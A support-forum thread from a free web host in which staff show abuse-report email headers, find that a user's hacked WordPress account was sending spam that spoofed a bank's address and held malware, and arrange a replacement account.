Jump to content

[Solved] Unsuspension


yoe06

Recommended Posts

We're receiving abuse reports about your email content, so you are sending spam even though you might not know it. These are just 2 reports, but we've received at least 5. Unfortunately Terra doesn't include the message body so we can't identifyĀ whatĀ was being sent.

My bet is that your Wordpress install is hacked. It's infamous for terrible security if not maintained properly.

We have received a complaint about your account. Please investigate and fix within 24 hours.

Hurricane Electric Abuse Department
support@he.net

From fbl@bounce.mailstream.senderscore.net  Fri Mar 24 05:23:05 2023
Return-Path: <fbl@bounce.mailstream.senderscore.net>
X-Original-To: report@abuse.he.net
Delivered-To: report@abuse.he.net
Received: from mail.he.net (mail.he.net [216.218.186.2])
        by abuse.he.net (Postfix) with ESMTPS id B587D1EA07AD
        for <report@abuse.he.net>; Fri, 24 Mar 2023 05:23:03 -0700 (PDT)
Authentication-Results: abuse.he.net; dkim=pass
        reason="1024-bit key; insecure key"
        header.d=senderscore.net header.i=@senderscore.net
        header.b=vwf8KX9r; dkim-adsp=none (insecure policy);
        dkim-atps=neutral
Authentication-Results: mail.he.net;
        dkim=pass (no signature error) header.i=@senderscore.net header.s=081107 header.b=vwf8KX9r;
        spf=pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) smtp.mailfrom=fbl@bounce.mailstream.senderscore.net smtp.helo=mrd.us-east-1a.returnpath.net;
        dmarc=none (Policy up to you. No DMARC record found) header.from=terrafbl.senderscore.net
X-DMARC-Results: none
X-SPF-Results: pass
Received-SPF: pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) client-ip=54.84.12.226; envelope-from=fbl@bounce.mailstream.senderscore.net; helo=mrd.us-east-1a.returnpath.net;
X-DKIM-Results: pass
Received: from mrd.us-east-1a.returnpath.net (mrd.us-east-1a.returnpath.net [54.84.12.226])
        by he.net with ESMTPS (TLS_AES_256_GCM_SHA384:TLSv1.3:Kx=any:Au=any:Enc=AESGCM(256):Mac=AEAD)
        for <abuse@he.net>; Fri, 24 Mar 2023 05:21:54 -0700
Received: (Haraka outbound); Fri, 24 Mar 2023 12:21:53 +0000
Received: from localhost ([10.252.144.226])
        by mrd.us-east-1a.returnpath.net (Haraka/2.8.28) with ESMTP id A8F1F9DD-D380-4311-8351-AA729BB2BE20.1
        envelope-from <fbl@bounce.mailstream.senderscore.net>;
        Fri, 24 Mar 2023 12:21:53 +0000
Subject: Terra Abuse Report
From: Terra FBL Service <feedbackloop@terrafbl.senderscore.net>
Date: Fri, 24 Mar 2023 12:21:53 +0000
Mime-Version: 1.0
X-Rp-Fbl: type=arf; subscriptionID=241378
Content-Type: multipart/report; report-type=feedback-report;
 boundary=9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Message-Id: <01GW9S2Y1K9S5SWZRZB9P864TG.fbl@bounce.mailstream.senderscore.net>
To: abuse@he.net
DKIM-Signature: v=1;a=rsa-sha256;bh=SnNdbWtFcIUlOne3VuazZQ8MSFEAKZlebEuCJQZyIgk=;c=relaxed/simple;d=senderscore.net;h=from:to:subject;s=081107;b=vwf8KX9rf1MCanxqKaF6Rwf8DYB/5PMb6WAR+9pbFv1aVvNx3DmS9Odh3kTkRrtagAB0sC0cE19vCSTle9SyMSeuRyy2119gAfgb9J2PAo3DIga+qzJCtsGck2T8VC5fnOVxRYJg1zNKoFcSne5u/9Kcwy1i76rnJ0S6qJiVpgU=

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

This is a Terra Abuse Report for an email message received from domain bund=
er.my.id, IP 65.19.141.67, on Tue, 28 Feb 2023 21:38:50 +0000.

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/feedback-report

Version: 1
Arrival-Date: Tue, 28 Feb 2023 21:38:50 +0000
Original-Mail-From: support@bunder.my.id
Abuse-Type: complaint
Subscription-Link: https://fbl.returnpath.net/manage/subscriptions/241378
User-Agent: ReturnPathFBL/2.0
Original-Rcpt-To: eb9538615f462d0de4fc3ef6b78b2567@terra.com.br
Reported-Domain: bunder.my.id
Source-Ip: 65.19.141.67
Source: Terra
Feedback-Type: abuse

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/rfc822

Return-Path: <support@bunder.my.id>
Delivered-To: 004734933d6e2dd86ec9019171129540@terra.com.br
Received: from mail-proxy03-mia.tpn.terra.com ([208.84.242.88])
 by mail-trr-box15-mia.tpn.terra.com with LMTP id oLPRJXF0/mMy2AEA9pqQ4A
 for <004734933d6e2dd86ec9019171129540@terra.com.br>; Tue, 28 Feb 2023 21:38:57 +0000
Received: from cmgw ([208.84.242.88])
 by mail-proxy03-mia.tpn.terra.com with LMTP id yN2LLW90/mMS7QEAR65jug
 ; Tue, 28 Feb 2023 21:38:57 +0000
Received: from johnny.heliohost.org ([65.19.141.67])
 by mail-cmgw-in07-mia.tpn.terra.com with ESMTP
 id X7gRp4ewlpcl8X7gTprKTb; Tue, 28 Feb 2023 21:38:54 +0000
X-Terra-Spam: No
X-CMAE-Analysis: v=2.3 cv=XPNOtjpE c=1 sm=1 tr=0
 a=QxEgMx/s3b230QKQu9V1uw==:117 a=QxEgMx/s3b230QKQu9V1uw==:17
 a=m04uMKEZRckA:10 a=r77TgQKjGQsHNAKrUKIA:9 a=xgFWuFCl1Ux1yQevzSEA:9
 a=CjuIK1q_8ugA:10
X-CMAE-Score: 0
Received: by johnny.heliohost.org (Postfix, from userid 10411)
 id 0BF80402F8F4; Tue, 28 Feb 2023 21:38:51 +0000 (UTC)
To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: 111
Date: Tue, 28 Feb 2023 21:38:50 +0000
From: support@bunder.my.id
Message-ID: <e6840e9fcc8446fc0d29774778a64934@bunder.my.id>
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="b1_e6840e9fcc8446fc0d29774778a64934"
Content-Transfer-Encoding: 8bit
X-PPP-Message-ID: <167762033079.29295.9162551223616650781@johnny.heliohost.org>
X-PPP-Vhost: yoe06.heliohost.us
X-CMAE-Envelope: MS4wfErSt2kCFv9nKpE17Lxhn6JtK15vrioxLAEzKv9gFKU/bBtSxwwBP8K+PUe9GOJbbi8ZTxNVW4R78oRWX+1kmqE2icIkWBbKwwmBME4gdFoAoE6rM+cW
 ZtpU71GjCXUj7Bo6Wyst2aiaMzOXJ1375gnURpxr/1dVn6A+iYJuL/BM


--b1_e6840e9fcc8446fc0d29774778a64934
Content-Type: text/plain; charset=us-ascii

sa



--b1_e6840e9fcc8446fc0d29774778a64934
Content-Type: text/html; charset=us-ascii

sa




--b1_e6840e9fcc8446fc0d29774778a64934--

--9d2fb1fc9c947ffc232c186782fc1b4aaf5eedaa2e8017bfce3d0e94aee0--
We have received a complaint about your account. Please investigate and fix within 24 hours.

Hurricane Electric Abuse Department
support@he.net

From fbl@bounce.mailstream.senderscore.net  Sun Mar 19 17:17:38 2023
Return-Path: <fbl@bounce.mailstream.senderscore.net>
X-Original-To: report@abuse.he.net
Delivered-To: report@abuse.he.net
Received: from mail.he.net (mail.he.net [216.218.186.2])
        by abuse.he.net (Postfix) with ESMTPS id 0FC511EA0783
        for <report@abuse.he.net>; Sun, 19 Mar 2023 17:17:36 -0700 (PDT)
Authentication-Results: abuse.he.net; dkim=pass
        reason="1024-bit key; insecure key"
        header.d=senderscore.net header.i=@senderscore.net
        header.b=oEFq8rX4; dkim-adsp=none (insecure policy);
        dkim-atps=neutral
Authentication-Results: mail.he.net;
        dkim=pass (no signature error) header.i=@senderscore.net header.s=081107 header.b=oEFq8rX4;
        spf=pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) smtp.mailfrom=fbl@bounce.mailstream.senderscore.net smtp.helo=mrd.us-east-1a.returnpath.net;
        dmarc=none (Policy up to you. No DMARC record found) header.from=terrafbl.senderscore.net
X-DMARC-Results: none
X-SPF-Results: pass
Received-SPF: pass (mail.he.net: domain of bounce.mailstream.senderscore.net designates 54.84.12.226 as permitted sender) client-ip=54.84.12.226; envelope-from=fbl@bounce.mailstream.senderscore.net; helo=mrd.us-east-1a.returnpath.net;
X-DKIM-Results: pass
Received: from mrd.us-east-1a.returnpath.net (mrd.us-east-1a.returnpath.net [54.84.12.226])
        by he.net with ESMTPS (TLS_AES_256_GCM_SHA384:TLSv1.3:Kx=any:Au=any:Enc=AESGCM(256):Mac=AEAD)
        for <abuse@he.net>; Sun, 19 Mar 2023 17:16:31 -0700
Received: (Haraka outbound); Mon, 20 Mar 2023 00:16:30 +0000
Received: from localhost ([10.252.144.144])
        by mrd.us-east-1a.returnpath.net (Haraka/2.8.28) with ESMTP id 9116F793-039D-4E15-84EC-D0B075D1CF45.1
        envelope-from <fbl@bounce.mailstream.senderscore.net>;
        Mon, 20 Mar 2023 00:16:30 +0000
Message-Id: <01GVY5ZV4HM6RCYWTRKFF3SMPW.fbl@bounce.mailstream.senderscore.net>
To: abuse@he.net
Subject: Terra Abuse Report
From: Terra FBL Service <feedbackloop@terrafbl.senderscore.net>
Date: Mon, 20 Mar 2023 00:16:30 +0000
Mime-Version: 1.0
X-Rp-Fbl: type=arf; subscriptionID=241378
Content-Type: multipart/report; report-type=feedback-report;
 boundary=9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
DKIM-Signature: v=1;a=rsa-sha256;bh=EyRctsEeRiHeBzs8k3oUAnZQGq30PMKlh6mNURiFKgo=;c=relaxed/simple;d=senderscore.net;h=from:to:subject;s=081107;b=oEFq8rX4A3wGMu3tNc1OXev5kOeWW/4ckv7vC9IsR8LRPgFbvF3MEd/A0lY089mWQofN8B5JTRJeg9PaYKYiez0FNOv4hG/RpxmZK3+jYZsRtyVpJfXSmqRolg0HjP2YC04Cmx9F2gaqdFYFID8UgnuHomUYD6LGDEuvXOnL49Q=

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

This is a Terra Abuse Report for an email message received from domain yoe0=
6.heliohost.us, IP 65.19.141.67, on Wed, 01 Mar 2023 11:43:53 +0000.

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/feedback-report

Original-Rcpt-To: eb9538615f462d0de4fc3ef6b78b2567@terra.com.br
Source-Ip: 65.19.141.67
Abuse-Type: complaint
Feedback-Type: abuse
User-Agent: ReturnPathFBL/2.0
Version: 1
Arrival-Date: Wed, 01 Mar 2023 11:43:53 +0000
Original-Mail-From: yoe06@yoe06.heliohost.us
Reported-Domain: yoe06.heliohost.us
Source: Terra
Subscription-Link: https://fbl.returnpath.net/manage/subscriptions/241378

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Content-Type: message/rfc822

Return-Path: <yoe06@yoe06.heliohost.us>
Delivered-To: 004734933d6e2dd86ec9019171129540@terra.com.br
Received: from mail-proxy05-mia.tpn.terra.com ([208.84.242.111])
 by mail-trr-box15-mia.tpn.terra.com with LMTP id wKi5KIA6/2NiCQAA9pqQ4A
 for <004734933d6e2dd86ec9019171129540@terra.com.br>; Wed, 01 Mar 2023 11:44:00 +0000
Received: from cmgw ([208.84.242.111])
 by mail-proxy05-mia.tpn.terra.com with LMTP id SKtJDoA6/2MdXgEAIU0ysA
 ; Wed, 01 Mar 2023 11:44:00 +0000
Received: from johnny.heliohost.org ([65.19.141.67])
 by mail-cmgw-in17-mia.tpn.terra.com with ESMTP
 id XKsFp780CyhsEXKsHpJjZh; Wed, 01 Mar 2023 11:44:00 +0000
X-Terra-Spam: No
X-CMAE-Analysis: v=2.3 cv=epKhMbhX c=1 sm=1 tr=0
 a=QxEgMx/s3b230QKQu9V1uw==:117 a=QxEgMx/s3b230QKQu9V1uw==:17
 a=8nJEP1OIZ-IA:10 a=k__wU0fu6RkA:10 a=v0iDO7klbHDT2XZXJOUA:9 a=wPNLvfGTeEIA:10
X-CMAE-Score: 0
Received: by johnny.heliohost.org (Postfix, from userid 10411)
 id 01A994063284; Wed, 1 Mar 2023 11:43:53 +0000 (UTC)
To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: bunder1
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
X-Mailer: Microsoft Office Outlook, Build 17.551210
X-Priority: 1
X-MSmail-Priority: High
From: <sac@bradesco.com.br>
X-PPP-Message-ID: <167767103359.26215.9305641372538039991@johnny.heliohost.org>
X-PPP-Vhost: yoe06.heliohost.us
Message-Id: <20230301114354.01A994063284@johnny.heliohost.org>
Date: Wed, 1 Mar 2023 11:43:53 +0000 (UTC)
X-CMAE-Envelope: MS4wfHYHS7YZ+ObaIHDO4mUc9LId6QQuNGxl0THmKR15lCyLZAMKdqG/UJwv7oh+hG5/cNjYRVb8mjbVtAFTPZfs7DFcmztiqzQ6Y46babPpguKVpq77EVJW
 xDBqtQez6tWE2p6ihk5Jzya6boifrAInlRIc5rQp+pOA3e9Z44estkC6vBjJ3tEUg0oFYHDfwZ9vBg==


as

--9388b03922054cdb4eda0d6e270a7edf8936ad0865603869a2d674e6bfca--

Ā 

Link to comment
Share on other sites

Just a correction regarding Terra abuse report emails:

They do have the message contents, though it may be difficult to read.

First message:

Quote

To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: 111
Date: Tue, 28 Feb 2023 21:38:50 +0000
From: support@bunder.my.id
Message:Ā sa

Second message:

Quote

To: "0856492f4c532a9a5ae6086260cb7cb3 04cec7ce92eb9ad836da62cc8c526019" <eb9538615f462d0de4fc3ef6b78b2567@terra.com.br>
Subject: bunder1
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
X-Mailer: Microsoft Office Outlook, Build 17.551210
X-Priority: 1
X-MSmail-Priority: High
From: <sac@bradesco.com.br>
Date: Wed, 1 Mar 2023 11:43:53 +0000 (UTC)
Message:Ā as

Please note that second message was sent from Microsoft Outlook, not directly from your server's account (i.e., without using a mail client), so either you got your email account credentials stolen or your device is infected with some kind of malware. That second message even tried to spoof the from address, trying to impersonate a customer service email address (sac@bradesco.com.br) from a Brazilian bank (Bradesco) while in fact being sent fromĀ yoe06@yoe06.heliohost.us.

Please also note that both messages do not seem to be automatically reported by Terra mailing system (X-Terra-Spam: No), but rather manually flagged as spam/reported by the receiver, which in both cases is the same (eb9538615f462d0de4fc3ef6b78b2567@terra.com.br), but it is possible I am misinterpreting it.

Link to comment
Share on other sites

Did some digging...the yoe06@yoe06.heliohost.us account was used to spew bogus emails (and text messages via SMTP->SMS gateways). Tons of NDR notices for emails that just have "bunder <random numbers>" as the body, or the above "sa" and "as". I'm guessing a cybercriminal verifying emails considering there's no meaningful content in any of them. The abuse reports above have hashed emails as the recipients.

WordPress is very clearly hacked, and the account is full of malware. I see:

  • At least 2 dropper scripts
  • What I think is a bot for a botnet
  • A script meant to exfiltrate phished credentials.
  • A phishing site.

Time for a new account...

Link to comment
Share on other sites

  • wolstech changed the title to Unsuspension
19 hours ago, wolstech said:

Also, do you want your forum accounts merged? You have 3 forum accounts (yoe06, yoe2006, yoefie), and it looks like you've posted from both yoe06 and yoe2006.

if that's possible, that's fine, because the yoe2006 and yoefie accounts can no longer access there

Link to comment
Share on other sites

21 hours ago, wolstech said:

Invite for replacement account has been sent. Let us know when it's set up and I can have Krydos move your domains to the new account.

I have created a new account with yoefie, hopefully nothing like yesterday will happen again

Link to comment
Share on other sites

22 hours ago, Kairion said:

Just a correction regarding Terra abuse report emails:

They do have the message contents, though it may be difficult to read.

First message:

Second message:

Please note that second message was sent from Microsoft Outlook, not directly from your server's account (i.e., without using a mail client), so either you got your email account credentials stolen or your device is infected with some kind of malware. That second message even tried to spoof the from address, trying to impersonate a customer service email address (sac@bradesco.com.br) from a Brazilian bank (Bradesco) while in fact being sent fromĀ yoe06@yoe06.heliohost.us.

Please also note that both messages do not seem to be automatically reported by Terra mailing system (X-Terra-Spam: No), but rather manually flagged as spam/reported by the receiver, which in both cases is the same (eb9538615f462d0de4fc3ef6b78b2567@terra.com.br), but it is possible I am misinterpreting it.

i never send email using my own domain i created an email account with my domain for me to switch to gmail

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...